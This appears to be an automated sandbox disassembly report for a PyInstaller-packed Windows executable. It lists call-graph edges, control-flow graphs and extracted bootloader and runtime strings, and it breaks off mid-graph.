17599->17600 17601 7ff7262986b0 2 API calls 17600->17601 17606 7ff72629414e 17600->17606 17603 7ff7262940f6 17601->17603 17602 7ff72629b870 _log10_special 8 API calls 17604 7ff726294169 17602->17604 17605 7ff7262940fb CreateSymbolicLinkW 17603->17605 17603->17606 17604->17583 17605->17606 17607 7ff726294125 17605->17607 17606->17602 17607->17606 17608 7ff72629412e GetLastError 17607->17608 17608->17606 17609 7ff726294139 17608->17609 17610 7ff7262940a0 10 API calls 17609->17610 17610->17606 17612 7ff7262a428a 17611->17612 17613 7ff7262a425d 17611->17613 17615 7ff7262a42ad 17612->17615 17616 7ff7262a42c9 17612->17616 17614 7ff7262a43f4 _get_daylight 11 API calls 17613->17614 17621 7ff7262a4214 17613->17621 17617 7ff7262a4267 17614->17617 17618 7ff7262a43f4 _get_daylight 11 API calls 17615->17618 17619 7ff7262a4178 45 API calls 17616->17619 17620 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17617->17620 17622 7ff7262a42b2 17618->17622 17625 7ff7262a42bd 17619->17625 17623 7ff7262a4272 17620->17623 17621->17522 17624 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17622->17624 17623->17522 17624->17625 17625->17522 17627 7ff726293ae6 17626->17627 17628 7ff7262a3ca4 49 API calls 17627->17628 17629 7ff726293b0c 17628->17629 17630 7ff726293b1d 17629->17630 17631 7ff726293f10 10 API calls 17629->17631 17630->17535 17632 7ff726293b2f 17631->17632 17632->17535 17634 7ff726297415 17633->17634 17635 7ff726293f70 108 API calls 17634->17635 17636 7ff72629743b 17635->17636 17637 7ff726297462 17636->17637 17638 7ff726293f70 108 API calls 17636->17638 17640 7ff72629b870 _log10_special 8 API calls 17637->17640 17639 7ff726297452 17638->17639 17641 7ff72629746c 17639->17641 17642 7ff72629745d 17639->17642 17643 7ff726293c27 17640->17643 17663 7ff72629f404 17641->17663 17644 7ff72629f36c 74 API calls 17642->17644 17643->17543 17643->17547 17644->17637 17646 7ff72629f36c 74 API calls 17647 7ff7262974f7 17646->17647 17649 7ff72629f36c 74 API calls 17647->17649 17648 7ff72629f6bc _fread_nolock 53 API calls 17653 7ff726297471 17648->17653 17649->17637 17650 7ff7262974d6 17651 7ff72629f430 37 API calls 17650->17651 17654 7ff7262974d1 17651->17654 17652 7ff72629fdfc 76 API calls 17652->17653 17653->17648 17653->17650 17653->17652 17653->17654 17655 7ff72629f430 37 API calls 17653->17655 17657 7ff7262974cf 17653->17657 17658 7ff72629f404 37 API calls 17653->17658 17654->17657 17669 7ff7262a6628 17654->17669 17655->17653 17657->17646 17658->17653 17661 7ff726291805 17659->17661 17662 7ff726291875 17659->17662 17660 7ff7262a4250 45 API calls 17660->17661 17661->17660 17661->17662 17662->17562 17662->17563 17664 7ff72629f41d 17663->17664 17665 7ff72629f40d 17663->17665 17664->17653 17666 7ff7262a43f4 _get_daylight 11 API calls 17665->17666 17667 7ff72629f412 17666->17667 17668 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17667->17668 17668->17664 17670 7ff7262a6630 17669->17670 17671 7ff7262a664c 17670->17671 17672 7ff7262a666d 17670->17672 17690 7ff7262a51d8 17689->17690 17691 7ff7262a51fe 17690->17691 17693 7ff7262a5231 17690->17693 17692 7ff7262a43f4 _get_daylight 11 API calls 17691->17692 17694 7ff7262a5203 17692->17694 17696 7ff7262a5244 17693->17696 17697 7ff7262a5237 17693->17697 17695 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 17694->17695 17698 7ff726293fc6 17695->17698 17708 7ff7262a9f38 17696->17708 17699 7ff7262a43f4 _get_daylight 11 API calls 17697->17699 17698->16467 17699->17698 17721 7ff7262af5e8 EnterCriticalSection 17708->17721 18081 7ff7262a6c08 18080->18081 18084 7ff7262a66e4 18081->18084 18083 7ff7262a6c21 18083->16477 18085 7ff7262a66ff 18084->18085 18086 7ff7262a672e 18084->18086 18087 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 18085->18087 18094 7ff7262a477c EnterCriticalSection 18086->18094 18093 7ff7262a671f 18087->18093 18093->18083 18096 7ff72629f191 18095->18096 18097 7ff72629f163 18095->18097 18104 7ff72629f183 18096->18104 18105 7ff7262a477c EnterCriticalSection 18096->18105 18098 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 18097->18098 18098->18104 18104->16481 18107 7ff7262986b0 2 API calls 18106->18107 18108 7ff7262981b4 LoadLibraryExW 18107->18108 18109 7ff7262981d3 __std_exception_copy 18108->18109 18109->16511 18111 7ff726296ef3 GetProcAddress 18110->18111 18112 7ff726296ec9 18110->18112 18111->18112 18113 7ff726296f18 GetProcAddress 18111->18113 18115 7ff7262929e0 51 API calls 18112->18115 18113->18112 18114 7ff726296f3d GetProcAddress 18113->18114 18114->18112 18116 7ff726296f65 GetProcAddress 18114->18116 18117 7ff726296ee3 18115->18117 18116->18112 18118 7ff726296f8d GetProcAddress 18116->18118 18117->16518 18118->18112 18119 7ff726296fb5 GetProcAddress 18118->18119 18120 7ff726296fd1 18119->18120 18121 7ff726296fdd GetProcAddress 18119->18121 18120->18121 18122 7ff726297005 GetProcAddress 18121->18122 18123 7ff726296ff9 18121->18123 18124 7ff726297021 18122->18124 18125 7ff72629702d GetProcAddress 18122->18125 18123->18122 18124->18125 18126 7ff726297055 GetProcAddress 18125->18126 18127 7ff726297049 18125->18127 18128 7ff726297071 18126->18128 18129 7ff72629707d GetProcAddress 18126->18129 18127->18126 18128->18129 18130 7ff7262970a5 GetProcAddress 18129->18130 18131 7ff726297099 18129->18131 18132 7ff7262970c1 18130->18132 18133 7ff7262970cd GetProcAddress 18130->18133 18131->18130 18132->18133 18134 7ff7262970f5 GetProcAddress 18133->18134 18135 7ff7262970e9 18133->18135 18136 7ff726297111 18134->18136 18137 7ff72629711d GetProcAddress 18134->18137 18135->18134 18136->18137 18138 7ff726297145 GetProcAddress 18137->18138 18139 7ff726297139 18137->18139 18140 7ff726297161 18138->18140 18141 7ff72629716d GetProcAddress 18138->18141 18139->18138 18140->18141 18173->16538 18174->16540 18176 7ff726295b05 18175->18176 18177 7ff726291bf0 49 API calls 18176->18177 18178 7ff726295b41 18177->18178 18179 7ff726295b4a 18178->18179 18180 7ff726295b6d 18178->18180 18181 7ff7262925f0 53 API calls 18179->18181 18182 7ff726293fe0 49 API calls 18180->18182 18198 7ff726295b63 18181->18198 18183 7ff726295b85 18182->18183 18184 7ff726295ba3 18183->18184 18185 7ff7262925f0 53 API calls 18183->18185 18186 7ff726293f10 10 API calls 18184->18186 18185->18184 18188 7ff726295bad 18186->18188 18187 7ff72629b870 _log10_special 8 API calls 18189 7ff72629308e 18187->18189 18190 7ff726295bbb 18188->18190 18191 7ff7262981a0 3 API calls 18188->18191 18189->16551 18206 7ff726295c80 18189->18206 18192 7ff726293fe0 49 API calls 18190->18192 18191->18190 18193 7ff726295bd4 18192->18193 18194 7ff726295bf9 18193->18194 18195 7ff726295bd9 18193->18195 18197 7ff7262981a0 3 API calls 18194->18197 18196 7ff7262925f0 53 API calls 18195->18196 18196->18198 18199 7ff726295c06 18197->18199 18198->18187 18200 7ff726295c12 18199->18200 18201 7ff726295c49 18199->18201 18202 7ff7262986b0 2 API calls 18200->18202 18260 7ff7262950b0 GetProcAddress 18201->18260 18204 7ff726295c2a 18202->18204 18205 7ff7262929e0 51 API calls 18204->18205 18205->18198 18345 7ff726294c80 18206->18345 18208 7ff726295cba 18209 7ff726295cc2 18208->18209 18210 7ff726295cd3 18208->18210 18211 7ff7262925f0 53 API calls 18209->18211 18352 7ff726294450 18210->18352 18217 7ff726295cce 18211->18217 18214 7ff726295cdf 18216 7ff7262925f0 53 API calls 18214->18216 18215 7ff726295cf0 18218 7ff726295cff 18215->18218 18219 7ff726295d10 18215->18219 18216->18217 18217->16547 18220 7ff7262925f0 53 API calls 18218->18220 18356 7ff726294700 18219->18356 18220->18217 18222 7ff726295d2b 18223 7ff726295d2f 18222->18223 18224 7ff726295d40 18222->18224 18225 7ff7262925f0 53 API calls 18223->18225 18226 7ff726295d4f 18224->18226 18227 7ff726295d60 18224->18227 18225->18217 18228 7ff7262925f0 53 API calls 18226->18228 18363 7ff7262945a0 18227->18363 18228->18217 18246 7ff726295820 18245->18246 18246->18246 18247 7ff726295849 18246->18247 18252 7ff726295860 __std_exception_copy 18246->18252 18248 7ff7262925f0 53 API calls 18247->18248 18249 7ff726295855 18248->18249 18249->16549 18250 7ff72629596b 18250->16549 18251 7ff726291440 116 API calls 18251->18252 18252->18250 18252->18251 18253 7ff7262925f0 53 API calls 18252->18253 18253->18252 18255 7ff726295ab7 18254->18255 18258 7ff7262959c6 18254->18258 18255->16551 18256 7ff726295ad2 18257 7ff7262925f0 53 API calls 18256->18257 18257->18255 18258->18255 18258->18256 18259 7ff7262925f0 53 API calls 18258->18259 18259->18258 18261 7ff7262950f7 GetProcAddress 18260->18261 18269 7ff7262950d2 18260->18269 18262 7ff72629511c GetProcAddress 18261->18262 18261->18269 18264 7ff726295141 GetProcAddress 18262->18264 18262->18269 18263 7ff7262929e0 51 API calls 18266 7ff7262950ec 18263->18266 18265 7ff726295169 GetProcAddress 18264->18265 18264->18269 18267 7ff726295191 GetProcAddress 18265->18267 18265->18269 18266->18198 18268 7ff7262951b9 GetProcAddress 18267->18268 18267->18269 18270 7ff7262951e1 GetProcAddress 18268->18270 18271 7ff7262951d5 18268->18271 18269->18263 18272 7ff726295209 GetProcAddress 18270->18272 18273 7ff7262951fd 18270->18273 18271->18270 18274 7ff726295231 GetProcAddress 18272->18274 18275 7ff726295225 18272->18275 18273->18272 18276 7ff726295259 GetProcAddress 18274->18276 18277 7ff72629524d 18274->18277 18275->18274 18278 7ff726295281 GetProcAddress 18276->18278 18279 7ff726295275 18276->18279 18277->18276 18280 7ff7262952a9 GetProcAddress 18278->18280 18281 7ff72629529d 18278->18281 18279->18278 18282 7ff7262952d1 GetProcAddress 18280->18282 18283 7ff7262952c5 18280->18283 18281->18280 18283->18282 18347 7ff726294cac 18345->18347 18346 7ff726294cb4 18346->18208 18347->18346 18350 7ff726294e54 18347->18350 18383 7ff7262a5db4 18347->18383 18348 7ff726295017 __std_exception_copy 18348->18208 18349 7ff726294180 47 API calls 18349->18350 18350->18348 18350->18349 18353 7ff726294480 18352->18353 18354 7ff72629b870 _log10_special 8 API calls 18353->18354 18355 7ff7262944ea 18354->18355 18355->18214 18355->18215 18357 7ff72629476f 18356->18357 18360 7ff72629471b 18356->18360 18358 7ff726294300 2 API calls 18357->18358 18359 7ff72629477c 18358->18359 18359->18222 18362 7ff72629475a 18360->18362 18441 7ff726294300 18360->18441 18362->18222 18364 7ff7262945b5 18363->18364 18365 7ff726291bf0 49 API calls 18364->18365 18366 7ff726294601 18365->18366 18384 7ff7262a5de4 18383->18384 18387 7ff7262a52b0 18384->18387 18386 7ff7262a5e14 18386->18347 18388 7ff7262a52e1 18387->18388 18389 7ff7262a52f3 18387->18389 18390 7ff7262a43f4 _get_daylight 11 API calls 18388->18390 18391 7ff7262a533d 18389->18391 18394 7ff7262a5300 18389->18394 18393 7ff7262a52e6 18390->18393 18392 7ff7262a5358 18391->18392 18396 7ff7262a3ae0 45 API calls 18391->18396 18399 7ff7262a537a 18392->18399 18408 7ff7262a5d3c 18392->18408 18398 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18393->18398 18395 7ff7262a9b24 _invalid_parameter_noinfo 37 API calls 18394->18395 18405 7ff7262a52f1 18395->18405 18396->18392 18398->18405 18400 7ff7262a541b 18399->18400 18401 7ff7262a43f4 _get_daylight 11 API calls 18399->18401 18402 7ff7262a43f4 _get_daylight 11 API calls 18400->18402 18400->18405 18403 7ff7262a5410 18401->18403 18404 7ff7262a54c6 18402->18404 18406 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18403->18406 18407 7ff7262a9bf0 _invalid_parameter_noinfo 37 API calls 18404->18407 18405->18386 18406->18400 18407->18405 18409 7ff7262a5d5f 18408->18409 18410 7ff7262a5d76 18408->18410 18414 7ff7262af278 18409->18414 18412 7ff7262a5d64 18410->18412 18419 7ff7262af2a8 18410->18419 18412->18392 18415 7ff7262aa460 __CxxCallCatchBlock 45 API calls 18414->18415 18416 7ff7262af281 18415->18416 18417 7ff7262acc94 45 API calls 18416->18417 18418 7ff7262af29a 18417->18418 18418->18412 18420 7ff7262a4178 45 API calls 18419->18420 18422 7ff7262af2e1 18420->18422 18421 7ff7262af2ed 18423 7ff72629b870 _log10_special 8 API calls 18421->18423 18422->18421 18426 7ff7262b2150 18422->18426 18425 7ff7262af397 18423->18425 18425->18412 18427 7ff7262a4178 45 API calls 18426->18427 18428 7ff7262b2192 18427->18428 18429 7ff7262aebb0 _fread_nolock MultiByteToWideChar 18428->18429 18431 7ff7262b21c8 18429->18431 18430 7ff7262b21cf 18434 7ff72629b870 _log10_special 8 API calls 18430->18434 18431->18430 18432 7ff7262b21f8 __scrt_get_show_window_mode 18431->18432 18433 7ff7262ac90c _fread_nolock 12 API calls 18431->18433 18435 7ff7262b228c 18431->18435 18432->18435 18438 7ff7262aebb0 _fread_nolock MultiByteToWideChar 18432->18438 18433->18432 18436 7ff7262b22c5 18434->18436 18435->18430 18437 7ff7262a9c58 __free_lconv_mon 11 API calls 18435->18437 18436->18421 18437->18430 18439 7ff7262b226e 18438->18439 18439->18435 18440 7ff7262b2272 GetStringTypeW 18439->18440 18440->18435 18442 7ff7262986b0 2 API calls 18441->18442 18443 7ff726294325 __std_exception_copy 18442->18443 18443->18362 18463->16553

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 0 7ff726291000-7ff726293536 call 7ff72629f138 call 7ff72629f140 call 7ff72629bb70 call 7ff7262a4700 call 7ff7262a4794 call 7ff7262933e0 14 7ff726293544-7ff726293566 call 7ff7262918f0 0->14 15 7ff726293538-7ff72629353f 0->15 21 7ff726293736-7ff72629374c call 7ff726293f70 14->21 22 7ff72629356c-7ff726293583 call 7ff726291bf0 14->22 16 7ff72629371a-7ff726293735 call 7ff72629b870 15->16 27 7ff726293785-7ff72629379a call 7ff7262925f0 21->27 28 7ff72629374e-7ff72629377b call 7ff7262976a0 21->28 26 7ff726293588-7ff7262935c1 22->26 29 7ff726293653-7ff72629366d call 7ff726297e10 26->29 30 7ff7262935c7-7ff7262935cb 26->30 44 7ff726293712 27->44 41 7ff72629379f-7ff7262937be call 7ff726291bf0 28->41 42 7ff72629377d-7ff726293780 call 7ff72629f36c 28->42 45 7ff72629366f-7ff726293675 29->45 46 7ff726293695-7ff72629369c 29->46 34 7ff726293638-7ff72629364d call 7ff7262918e0 30->34 35 7ff7262935cd-7ff7262935e5 call 7ff7262a4560 30->35 34->29 34->30 51 7ff7262935f2-7ff72629360a call 7ff7262a4560 35->51 52 7ff7262935e7-7ff7262935eb 35->52 61 7ff7262937c1-7ff7262937ca 41->61 42->27 44->16 49 7ff726293682-7ff726293690 call 7ff7262a415c 45->49 50 7ff726293677-7ff726293680 45->50 53 7ff7262936a2-7ff7262936c0 call 7ff726297e10 call 7ff726297f80 46->53 54 7ff726293844-7ff726293863 call 7ff726293e90 46->54 49->46 50->49 66 7ff726293617-7ff72629362f call 7ff7262a4560 51->66 67 7ff72629360c-7ff726293610 51->67 52->51 78 7ff72629380f-7ff72629381e call 7ff726298400 53->78 79 7ff7262936c6-7ff7262936c9 53->79 69 7ff726293871-7ff726293882 call 7ff726291bf0 54->69 70 7ff726293865-7ff72629386f call 7ff726293fe0 54->70 61->61 65 7ff7262937cc-7ff7262937e9 call 7ff7262918f0 61->65 65->26 82 7ff7262937ef-7ff726293800 call 7ff7262925f0 65->82 66->34 83 7ff726293631 66->83 67->66 81 7ff726293887-7ff7262938a1 call 7ff7262986b0 69->81 70->81 95 7ff726293820 78->95 96 7ff72629382c-7ff72629382f call 7ff726297c40 78->96 79->78 84 7ff7262936cf-7ff7262936f6 call 7ff726291bf0 79->84 91 7ff7262938af-7ff7262938c1 SetDllDirectoryW 81->91 92 7ff7262938a3 81->92 82->44 83->34 100 7ff726293805-7ff72629380d call 7ff7262a415c 84->100 101 7ff7262936fc-7ff726293703 call 7ff7262925f0 84->101 98 7ff7262938d0-7ff7262938ec call 7ff726296560 call 7ff726296b00 91->98 99 7ff7262938c3-7ff7262938ca 91->99 92->91 95->96 102 7ff726293834-7ff726293836 96->102 118 7ff726293947-7ff72629394a call 7ff726296510 98->118 119 7ff7262938ee-7ff7262938f4 98->119 99->98 103 7ff726293a50-7ff726293a58 99->103 100->81 112 7ff726293708-7ff72629370a 101->112 102->81 109 7ff726293838 102->109 107 7ff726293a5a-7ff726293a77 PostMessageW GetMessageW 103->107 108 7ff726293a7d-7ff726293aaf call 7ff7262933d0 call 7ff726293080 call 7ff7262933a0 call 7ff726296780 call 7ff726296510 103->108 107->108 109->54 112->44 127 7ff72629394f-7ff726293956 118->127 121 7ff7262938f6-7ff726293903 call 7ff7262965a0 119->121 122 7ff72629390e-7ff726293918 call 7ff726296970 119->122 121->122 135 7ff726293905-7ff72629390c 121->135 132 7ff726293923-7ff726293931 call 7ff726296cd0 122->132 133 7ff72629391a-7ff726293921 122->133 127->103 131 7ff72629395c-7ff726293966 call 7ff7262930e0 127->131 131->112 141 7ff72629396c-7ff726293980 call 7ff7262983e0 131->141 132->127 146 7ff726293933 132->146 138 7ff72629393a-7ff726293942 call 7ff726292870 call 7ff726296780 133->138 135->138 138->118 151 7ff726293982-7ff72629399f PostMessageW GetMessageW 141->151 152 7ff7262939a5-7ff7262939e1 call 7ff726297f20 call 7ff726297fc0 call 7ff726296780 call 7ff726296510 call 7ff726297ec0 141->152 146->138 151->152 162 7ff7262939e6-7ff7262939e8 152->162 163 7ff7262939ea-7ff726293a00 call 7ff7262981f0 call 7ff726297ec0 162->163 164 7ff726293a3d-7ff726293a4b call 7ff7262918a0 162->164 163->164 171 7ff726293a02-7ff726293a10 163->171 164->112 172 7ff726293a31-7ff726293a38 call 7ff726292870 171->172 173 7ff726293a12-7ff726293a2c call 7ff7262925f0 call 7ff7262918a0 171->173 172->164 173->112
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                  • API String ID: 514040917-585287483
                                                                                                                                  • Opcode ID: a5f7492e06fd6c7b6e3403bdd690060db9558d14b64228a0cdef0897f7d6b515
                                                                                                                                  • Instruction ID: b852cc82ee06741534dd79dbcb58081b8170e88bd3853e74e37e7728eca257e5
                                                                                                                                  • Opcode Fuzzy Hash: a5f7492e06fd6c7b6e3403bdd690060db9558d14b64228a0cdef0897f7d6b515
                                                                                                                                  • Instruction Fuzzy Hash: C5F18021A0A68291FA18FB21DD543FBA2D1EF94780FE44433DA5D43696FF2CE654CB60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 305 7ff7262b4f10-7ff7262b4f4b call 7ff7262b4898 call 7ff7262b48a0 call 7ff7262b4908 312 7ff7262b4f51-7ff7262b4f5c call 7ff7262b48a8 305->312 313 7ff7262b5175-7ff7262b51c1 call 7ff7262a9c10 call 7ff7262b4898 call 7ff7262b48a0 call 7ff7262b4908 305->313 312->313 318 7ff7262b4f62-7ff7262b4f6c 312->318 339 7ff7262b52ff-7ff7262b536d call 7ff7262a9c10 call 7ff7262b0888 313->339 340 7ff7262b51c7-7ff7262b51d2 call 7ff7262b48a8 313->340 320 7ff7262b4f8e-7ff7262b4f92 318->320 321 7ff7262b4f6e-7ff7262b4f71 318->321 324 7ff7262b4f95-7ff7262b4f9d 320->324 323 7ff7262b4f74-7ff7262b4f7f 321->323 326 7ff7262b4f81-7ff7262b4f88 323->326 327 7ff7262b4f8a-7ff7262b4f8c 323->327 324->324 328 7ff7262b4f9f-7ff7262b4fb2 call 7ff7262ac90c 324->328 326->323 326->327 327->320 330 7ff7262b4fbb-7ff7262b4fc9 327->330 336 7ff7262b4fb4-7ff7262b4fb6 call 7ff7262a9c58 328->336 337 7ff7262b4fca-7ff7262b4fd6 call 7ff7262a9c58 328->337 336->330 346 7ff7262b4fdd-7ff7262b4fe5 337->346 359 7ff7262b536f-7ff7262b5376 339->359 360 7ff7262b537b-7ff7262b537e 339->360 340->339 348 7ff7262b51d8-7ff7262b51e3 call 7ff7262b48d8 340->348 346->346 349 7ff7262b4fe7-7ff7262b4ff8 call 7ff7262af784 346->349 348->339 357 7ff7262b51e9-7ff7262b520c call 7ff7262a9c58 GetTimeZoneInformation 348->357 349->313 358 7ff7262b4ffe-7ff7262b5054 call 7ff7262b97e0 * 4 call 7ff7262b4e2c 349->358 374 7ff7262b5212-7ff7262b5233 357->374 375 7ff7262b52d4-7ff7262b52fe call 7ff7262b4890 call 7ff7262b4880 call 7ff7262b4888 357->375 417 7ff7262b5056-7ff7262b505a 358->417 365 7ff7262b540b-7ff7262b540e 359->365 361 7ff7262b5380 360->361 362 7ff7262b53b5-7ff7262b53c8 call 7ff7262ac90c 360->362 366 7ff7262b5383 361->366 382 7ff7262b53d3-7ff7262b53ee call 7ff7262b0888 362->382 383 7ff7262b53ca 362->383 365->366 367 7ff7262b5414-7ff7262b541c call 7ff7262b4f10 365->367 372 7ff7262b5388-7ff7262b53b4 call 7ff7262a9c58 call 7ff72629b870 366->372 373 7ff7262b5383 call 7ff7262b518c 366->373 367->372 373->372 380 7ff7262b5235-7ff7262b523b 374->380 381 7ff7262b523e-7ff7262b5245 374->381 380->381 388 7ff7262b5259 381->388 389 7ff7262b5247-7ff7262b524f 381->389 405 7ff7262b53f0-7ff7262b53f3 382->405 406 7ff7262b53f5-7ff7262b5407 call 7ff7262a9c58 382->406 390 7ff7262b53cc-7ff7262b53d1 call 7ff7262a9c58 383->390 395 7ff7262b525b-7ff7262b52cf call 7ff7262b97e0 * 4 call 7ff7262b1e6c call 7ff7262b5424 * 2 388->395 389->388 398 7ff7262b5251-7ff7262b5257 389->398 390->361 395->375 398->395 405->390 406->365 419 7ff7262b5060-7ff7262b5064 417->419 420 7ff7262b505c 417->420 419->417 422 7ff7262b5066-7ff7262b508b call 7ff7262a5e68 419->422 420->419 428 7ff7262b508e-7ff7262b5092 422->428 430 7ff7262b50a1-7ff7262b50a5 428->430 431 7ff7262b5094-7ff7262b509f 428->431 430->428 431->430 433 7ff7262b50a7-7ff7262b50ab 431->433 436 7ff7262b50ad-7ff7262b50d5 call 7ff7262a5e68 433->436 437 7ff7262b512c-7ff7262b5130 433->437 445 7ff7262b50f3-7ff7262b50f7 436->445 446 7ff7262b50d7 436->446 439 7ff7262b5132-7ff7262b5134 437->439 440 7ff7262b5137-7ff7262b5144 437->440 439->440 442 7ff7262b515f-7ff7262b516e call 7ff7262b4890 call 7ff7262b4880 440->442 443 7ff7262b5146-7ff7262b515c call 7ff7262b4e2c 440->443 442->313 443->442 445->437 451 7ff7262b50f9-7ff7262b5117 call 7ff7262a5e68 445->451 449 7ff7262b50da-7ff7262b50e1 446->449 449->445 452 7ff7262b50e3-7ff7262b50f1 449->452 457 7ff7262b5123-7ff7262b512a 451->457 452->445 452->449 457->437 458 7ff7262b5119-7ff7262b511d 457->458 458->437 459 7ff7262b511f 458->459 459->457
                                                                                                                                  APIs
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B4F55
                                                                                                                                    • Part of subcall function 00007FF7262B48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262B48BC
                                                                                                                                    • Part of subcall function 00007FF7262A9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C6E
                                                                                                                                    • Part of subcall function 00007FF7262A9C58: GetLastError.KERNEL32(?,?,?,00007FF7262B2032,?,?,?,00007FF7262B206F,?,?,00000000,00007FF7262B2535,?,?,?,00007FF7262B2467), ref: 00007FF7262A9C78
                                                                                                                                    • Part of subcall function 00007FF7262A9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7262A9BEF,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262A9C19
                                                                                                                                    • Part of subcall function 00007FF7262A9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7262A9BEF,?,?,?,?,?,00007FF7262A9ADA), ref: 00007FF7262A9C3E
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B4F44
                                                                                                                                    • Part of subcall function 00007FF7262B4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7262B491C
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B51BA
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B51CB
                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF7262B51DC
                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7262B541C), ref: 00007FF7262B5203
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2237634577.00007FF726291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF726290000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2237527321.00007FF726290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237788832.00007FF7262BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2237922240.00007FF7262D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2238602757.00007FF7262D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff726290000_3Af7PybsUi.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                  • API String ID: 4070488512-239921721
                                                                                                                                  • Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                  • Instruction ID: a6198b441a6b342cac4a1d33d9b6cf7ed791118ba0892b59ae2da74c4bc75299
                                                                                                                                  • Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
                                                                                                                                  • Instruction Fuzzy Hash: FCD1C326E1864246E720BF25DC812BBA3E5EF58794FC44037EA4D5BA85DF7CE441CB60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 490 7ff7262b5c74-7ff7262b5ce7 call 7ff7262b59a8 493 7ff7262b5d01-7ff7262b5d0b call 7ff7262a7830 490->493 494 7ff7262b5ce9-7ff7262b5cf2 call 7ff7262a43d4 490->494 500 7ff7262b5d26-7ff7262b5d8f CreateFileW 493->500 501 7ff7262b5d0d-7ff7262b5d24 call 7ff7262a43d4 call 7ff7262a43f4 493->501 499 7ff7262b5cf5-7ff7262b5cfc call 7ff7262a43f4 494->499 514 7ff7262b6042-7ff7262b6062 499->514 504 7ff7262b5d91-7ff7262b5d97 500->504 505 7ff7262b5e0c-7ff7262b5e17 GetFileType 500->505 501->499 506 7ff7262b5dd9-7ff7262b5e07 GetLastError call 7ff7262a4368 504->506 507 7ff7262b5d99-7ff7262b5d9d 504->507 509 7ff7262b5e19-7ff7262b5e54 GetLastError call 7ff7262a4368 CloseHandle 505->509 510 7ff7262b5e6a-7ff7262b5e71 505->510 506->499 507->506 512 7ff7262b5d9f-7ff7262b5dd7 CreateFileW 507->512 509->499 525 7ff7262b5e5a-7ff7262b5e65 call 7ff7262a43f4 509->525 517 7ff7262b5e73-7ff7262b5e77 510->517 518 7ff7262b5e79-7ff7262b5e7c 510->518 512->505 512->506 522 7ff7262b5e82-7ff7262b5ed7 call 7ff7262a7748 517->522 518->522 523 